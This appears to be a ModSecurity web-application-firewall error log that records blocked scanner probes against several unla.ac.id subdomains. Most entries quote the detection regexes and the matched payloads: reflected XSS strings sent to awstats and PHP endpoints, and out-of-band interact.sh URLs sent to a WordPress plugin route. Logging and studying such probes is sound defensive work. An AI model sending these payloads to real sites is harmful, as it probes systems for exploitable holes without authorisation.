[Tue Aug 29 11:53:01.901719 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAfWOT0AAAAL"]
[Tue Aug 29 11:53:02.546069 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAolKSwAAAAe"]
[Tue Aug 29 11:53:02.548021 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15rsCo-f0AAAfWOT4AAAAL"]
[Tue Aug 29 11:53:02.549731 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoml0QAAAAf"]
[Tue Aug 29 11:53:02.629640 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAopQ0QAAAAi"]
[Tue Aug 29 11:53:02.634298 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAnTlZEAAAAA"]
[Tue Aug 29 11:53:02.643483 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAot8LAAAAAn"]
[Tue Aug 29 11:53:02.683345 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAopQ0UAAAAi"]
[Tue Aug 29 11:53:02.732158 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoVqscAAAAH"]
[Tue Aug 29 11:53:02.735449 2023] [:error] [pid 2601] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAopQ0YAAAAi"]
[Tue Aug 29 11:53:02.739063 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAonhoMAAAAg"]
[Tue Aug 29 11:53:02.746739 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAoLfPcAAAAG"]
[Tue Aug 29 11:53:03.952415 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15r8Co-f0AAAoXJtsAAAAP"]
[Tue Aug 29 11:53:04.005443 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAonhoQAAAAg"]
[Tue Aug 29 11:53:04.030189 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAot8LUAAAAn"]
[Tue Aug 29 11:53:04.064363 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAhoHV4AAAAl"]
[Tue Aug 29 11:53:04.080934 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAonhoUAAAAg"]
[Tue Aug 29 11:53:04.447840 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15sMCo-f0AAAoesKkAAAAV"]
[Tue Aug 29 11:53:04.489037 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15sMCo-f0AAAojan4AAAAb"]
[Tue Aug 29 11:53:04.759799 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAot8LgAAAAn"]
[Tue Aug 29 11:53:04.777011 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoesKoAAAAV"]
[Tue Aug 29 11:53:04.777532 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAojan8AAAAb"]
[Tue Aug 29 11:53:04.780803 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoqbOkAAAAj"]
[Tue Aug 29 11:53:04.807250 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAlUlz4AAAA0"]
[Tue Aug 29 11:53:04.872631 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 